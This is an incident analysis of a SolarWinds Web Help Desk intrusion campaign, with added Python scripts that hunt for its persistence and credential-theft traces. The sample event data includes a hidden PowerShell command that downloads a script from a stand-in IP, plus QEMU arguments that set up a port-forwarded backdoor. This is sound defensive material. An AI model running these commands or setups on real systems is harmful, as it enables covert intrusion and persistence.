Microsoft has reported that a multi-stage intrusion campaign targeting internet-accessible SolarWinds Web Help Desk (WHD) instances for initial access may have exploited recently patched vulnerabilities before fixes were available. The sophisticated attacks, which took place in December 2025, saw threat actors compromise vulnerable WHD deployments to spawn PowerShell commands, ultimately downloading and executing additional malicious payloads. This activity highlights a critical and recurring security challenge where a single exposed application can serve as the gateway for a complete domain compromise, particularly when vulnerabilities remain unpatched or are inadequately monitored by security teams. The uncertainty surrounding the exact exploit used underscores the complexity of incident response when multiple critical flaws exist on a system simultaneously.
1. The Anatomy of the Attack
The investigation into the December 2025 intrusions revealed that several critical vulnerabilities were present on the compromised SolarWinds WHD instances at the same time, which made it difficult to pin down the initial access vector. At the time of the attacks, the targeted systems were exposed to a newer pair of flaws, CVE-2025-40551 and CVE-2025-40536, for which fixes were not published until January 2026; if those were the entry point, they were exploited as zero-days. The same systems, however, were also unpatched against an older vulnerability, CVE-2025-26399, which had been fixed in September 2025. All three flaws are rooted in the same component, AjaxProxy. CVE-2025-26399 is an unauthenticated remote code execution (RCE) bug that bypasses an earlier patch for that component. CVE-2025-40551, which has since been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, is an untrusted-data deserialization issue in the same AjaxProxy functionality. CVE-2025-40536 is a security control bypass that lets an attacker create valid AjaxProxy instances, which is the step needed to reach the RCE flaw. Because the intrusions occurred while the systems were vulnerable to both the old and the new CVEs, Microsoft stated it could not “reliably confirm the exact CVE used to gain an initial foothold.”
Once initial access was established, the threat actors focused on stealth and persistence. A key element of their post-exploitation strategy was the deployment of legitimate remote monitoring and management (RMM) software, specifically ManageEngine, to maintain persistent access. Abusing a commercial administration product lets an attacker blend in with routine IT activity, much as living-off-the-land techniques do with native tools, and makes their presence harder to detect. To further solidify their control, they established reverse SSH and RDP access, creating resilient backdoors into the environment. In a particularly evasive maneuver, the attackers registered a scheduled task that launches a QEMU virtual machine at system startup with the highest privileges. The virtual machine was likely used for further evasion and to provide SSH access via port forwarding: host-based security tooling sees only a long-running qemu process and its network traffic, while everything executed inside the guest is invisible to the host’s EDR and event logs. This heavy reliance on legitimate administrative tools and low-noise persistence mechanisms reflects a high level of operational security on the part of the attackers.
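The persistence and tool-abuse pattern described above can be hunted for in the Windows Security event log. The following Python script is an added example written for this page, not code from Microsoft’s report or from SolarWinds. It runs three checks over constructed sample events: a 4688 process-creation event in which the WHD Java process spawns PowerShell (assumption: WHD is a Java/Tomcat application, so its web process is java.exe under the install directory, and the install path fragment is illustrative), a 4698 scheduled-task-creation event whose task XML runs QEMU at boot with RunLevel HighestAvailable, and process execution matching an RMM product name (the ManageEngine substring heuristic is an assumption to replace with your own RMM inventory). All events, hostnames, file paths and the 198.51.100.7 address are constructed.

```python
"""Hunt constructed Windows Security events for the post-exploitation pattern
described above: SolarWinds WHD's Java process spawning a shell, a boot-time
scheduled task that launches QEMU with highest privileges, and RMM agent
execution. All events below are constructed samples, not real telemetry."""
import xml.etree.ElementTree as ET

# Assumption: WHD is a Java/Tomcat application, so its web process is java.exe
# under the install directory; the path fragment is an illustrative default.
WHD_PATH_HINT = "\\solarwinds\\webhelpdesk\\"
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumption: coarse substring heuristic; replace with your RMM inventory.
RMM_HINTS = ("manageengine",)
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_whd_child_shell(ev):
    """4688: the WHD java.exe has no business spawning a shell."""
    if ev.get("EventID") != 4688:
        return None
    parent, child = ev["ParentProcessName"], ev["NewProcessName"]
    if (basename(parent) == "java.exe" and WHD_PATH_HINT in parent.lower()
            and basename(child) in SHELLS):
        return f"WHD java.exe spawned {basename(child)}: {ev['CommandLine']}"
    return None


def check_qemu_boot_task(ev):
    """4698: task that runs qemu*.exe at boot with RunLevel HighestAvailable."""
    if ev.get("EventID") != 4698:
        return None
    root = ET.fromstring(ev["TaskContent"])
    cmds = [c.text or "" for c in root.findall(".//t:Exec/t:Command", TASK_NS)]
    at_boot = root.find(".//t:BootTrigger", TASK_NS) is not None
    highest = any(r.text == "HighestAvailable"
                  for r in root.findall(".//t:RunLevel", TASK_NS))
    if at_boot and highest and any(basename(c).startswith("qemu") for c in cmds):
        return f"Boot-time QEMU task {ev['TaskName']}: {cmds}"
    return None


def check_rmm_agent(ev):
    """4688: execution of an RMM agent the organisation did not deploy."""
    if ev.get("EventID") != 4688:
        return None
    haystack = (ev["NewProcessName"] + " " + ev.get("CommandLine", "")).lower()
    if any(h in haystack for h in RMM_HINTS):
        return f"RMM agent executed: {ev['NewProcessName']}"
    return None


CHECKS = (check_whd_child_shell, check_qemu_boot_task, check_rmm_agent)


def hunt(events):
    """Return (host, check name, detail) for every check that fires."""
    findings = []
    for ev in events:
        for check in CHECKS:
            hit = check(ev)
            if hit:
                findings.append((ev["Computer"], check.__name__, hit))
    return findings


# Constructed task XML in the format Windows writes to a 4698 event.
QEMU_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId>
    <RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\ProgramData\qemu\qemu-system-x86_64.exe</Command>
    <Arguments>-hda C:\ProgramData\qemu\disk.qcow2 -netdev user,id=n0,hostfwd=tcp::2222-:22 -device e1000,netdev=n0 -nographic</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed sample events (hosts, paths and the 198.51.100.7 address are invented).
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "WHD01",
     "ParentProcessName": r"C:\Program Files\SolarWinds\WebHelpDesk\bin\jre\bin\java.exe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"iwr http://198.51.100.7/u.ps1 -OutFile C:\\Windows\\Temp\\u.ps1\""},
    {"EventID": 4698, "Computer": "WHD01",
     "TaskName": r"\Microsoft\Windows\Maintenance\Update", "TaskContent": QEMU_TASK_XML},
    {"EventID": 4688, "Computer": "WHD01",
     "ParentProcessName": r"C:\Windows\System32\services.exe",
     "NewProcessName": r"C:\Program Files\ManageEngine\agent\agent.exe", "CommandLine": "agent.exe"},
    {"EventID": 4688, "Computer": "WHD01",   # benign: ordinary service host start
     "ParentProcessName": r"C:\Windows\System32\services.exe",
     "NewProcessName": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for host, rule, detail in hunt(SAMPLE_EVENTS):
        print(f"[{host}] {rule}: {detail}")
```

In practice the events would come from a SIEM export or `Get-WinEvent` rather than the inline list, and the task check doubles as a live hunt: the same BootTrigger, RunLevel and Exec/Command fields appear in the XML that `schtasks /query /xml` returns for every registered task, so the parser can be pointed at that output on a suspect host.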
2. Post-Exploitation and Mitigation Strategies
Following the establishment of a persistent foothold, the attackers escalated their privileges and moved laterally across the network toward their ultimate objective: full domain compromise. Their credential-harvesting methods were classic and effective. In some observed instances they used DLL sideloading to run code that read the memory of the Local Security Authority Subsystem Service (LSASS) process, the standard target for dumping cached credentials. After obtaining high-privilege credentials, the attackers executed a DCSync attack. This technique abuses the directory replication protocol: an account holding the Replicating Directory Changes rights (by default only domain controllers and Domain Admins) asks a legitimate domain controller to replicate password data, including the krbtgt hash, exactly as another domain controller would. It hands the attacker the keys to the entire kingdom without installing any malware on the domain controller itself, and, when Directory Service Access auditing is enabled, leaves only a replication access event (Event ID 4662) as a trace. The successful execution of this attack pattern, from exploiting an external service to achieving domain dominance, is a stark reminder of how quickly a localized breach can escalate into a full-blown organizational crisis.
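Both credential-theft steps can be detected from telemetry most domains already produce. The following Python script is an added example written for this page, not code from Microsoft’s report: Sysmon Event ID 10 (ProcessAccess) records which process opened LSASS and with what access mask, and Security Event ID 4662 on a domain controller records control-access requests for the DS-Replication-Get-Changes rights, which are exactly the rights a DCSync client needs (4662 is only written when Directory Service Access auditing is enabled). The replication GUIDs are the Active Directory schema values; the allowlists of domain controller accounts and sanctioned LSASS readers, the hostnames, account names and file paths are invented for the constructed sample events.

```python
"""Detect the credential-theft steps described above from constructed telemetry:
LSASS memory reads (Sysmon Event ID 10, ProcessAccess) and DCSync replication
requests (Security Event ID 4662 on a domain controller).
The events, hosts and account names below are constructed, not real logs."""

# Extended rights a DCSync client requests. Their use by a principal that is
# not a domain controller is the canonical DCSync signal. The GUIDs are the
# Active Directory schema values for these control access rights.
DS_REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
PROCESS_VM_READ = 0x0010  # the access right every LSASS dumper needs

# Assumption: your DC machine accounts and sanctioned replication accounts
# (e.g. a directory-sync service) belong here; these names are invented.
REPLICATION_ALLOWLIST = {"DC01$", "DC02$"}
# Assumption: processes allowed to open LSASS for reading (EDR, AV); invented.
LSASS_READER_ALLOWLIST = {r"c:\program files\windows defender\msmpeng.exe"}


def detect_dcsync(ev):
    """4662 carrying replication GUIDs from a principal that is not a DC."""
    if ev.get("EventID") != 4662:
        return None
    props = ev.get("Properties", "").lower()
    rights = [name for guid, name in DS_REPLICATION_RIGHTS.items() if guid in props]
    if not rights or ev["SubjectUserName"] in REPLICATION_ALLOWLIST:
        return None
    return (f"DCSync by {ev['SubjectDomainName']}\\{ev['SubjectUserName']} "
            f"against {ev['Computer']}: {', '.join(rights)}")


def detect_lsass_read(ev):
    """Sysmon 10: a non-allowlisted process opened lsass.exe with VM_READ."""
    if ev.get("EventID") != 10 or not ev["TargetImage"].lower().endswith("\\lsass.exe"):
        return None
    source = ev["SourceImage"].lower()
    granted = int(ev["GrantedAccess"], 16)
    if source in LSASS_READER_ALLOWLIST or not granted & PROCESS_VM_READ:
        return None
    # Sideloading hint: DLLs on the call stack that were loaded from outside
    # \Windows\ point at the planted library rather than a system module.
    modules = [frame.split("+", 1)[0] for frame in ev.get("CallTrace", "").split("|")]
    foreign = [m for m in modules
               if m.lower().endswith(".dll") and "\\windows\\" not in m.lower()]
    return (f"LSASS read by {source} (GrantedAccess 0x{granted:x}); "
            f"non-system DLLs on stack: {foreign}")


def hunt(events):
    """Return the detail string of every detector that fires, in event order."""
    findings = []
    for ev in events:
        for detector in (detect_dcsync, detect_lsass_read):
            hit = detector(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed sample events; 4662 Properties mimic the "%%7688" (Control Access)
# prefix followed by the requested right GUIDs that Windows writes.
REPL_PROPS = ("%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
              "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}")
SAMPLE_EVENTS = [
    {"EventID": 4662, "Computer": "DC01.corp.example", "SubjectDomainName": "CORP",
     "SubjectUserName": "svc_helpdesk", "AccessMask": "0x100",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "Properties": REPL_PROPS},
    {"EventID": 4662, "Computer": "DC01.corp.example", "SubjectDomainName": "CORP",
     "SubjectUserName": "DC02$", "Properties": REPL_PROPS},        # benign DC-to-DC replication
    {"EventID": 10, "Computer": "WHD01",
     "SourceImage": r"C:\ProgramData\Tools\updater.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c4a4|C:\Windows\System32\KERNELBASE.dll+2c2d6|C:\ProgramData\Tools\version.dll+1a3f|C:\ProgramData\Tools\updater.exe+4c21"},
    {"EventID": 10, "Computer": "WHD01",                             # benign AV engine access
     "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c4a4"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The DC02$ event is deliberately included to show why the allowlist matters: domain controllers request these rights from each other constantly, so the rule fires only for non-DC principals. The LSASS rule keys on PROCESS_VM_READ rather than a full 0x1fffff mask because dumpers frequently request the minimum they need.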
In light of these events, Microsoft has issued urgent recommendations for organizations running SolarWinds Web Help Desk. The first and most critical step is to apply the patches for all of the aforementioned vulnerabilities, CVE-2025-40551, CVE-2025-40536 and CVE-2025-26399, to close the initial access vector. Patching alone does not evict an attacker who is already inside, so a thorough hunt for signs of compromise must follow. Security teams should look for any RMM software the organization did not deploy, such as the ManageEngine tool used in this campaign, and remove it. Because credentials may have been stolen, including the krbtgt hash that a DCSync exposes, a comprehensive credential rotation should be conducted for all accounts, with priority on administrative and service accounts. Any host identified as potentially compromised must be isolated from the network immediately to prevent further lateral movement. These response actions are crucial for containing the threat and remediating the damage caused by the intrusion.
3. A Blueprint for Future Defense
The detailed analysis of this campaign provides a clear blueprint of an adversary’s tactics, which heavily favor stealth and legitimate system tools over noisy custom malware. The attackers’ reliance on living-off-the-land techniques, combined with standard RMM software and low-impact persistence mechanisms, demonstrates a sophisticated understanding of how typical security defenses are evaded. The incident serves as a case study reinforcing the principle that a single unpatched, internet-facing application can provide a direct path to a complete network takeover. It underscores the need for robust vulnerability management, continuous monitoring of endpoints (including the process lineage of web applications such as WHD, whose server process should never spawn PowerShell), and a security posture that assumes a breach is a matter of when, not if. Proactive defense requires more than patching; it demands an understanding of attacker methodologies in order to anticipate and counter their moves.

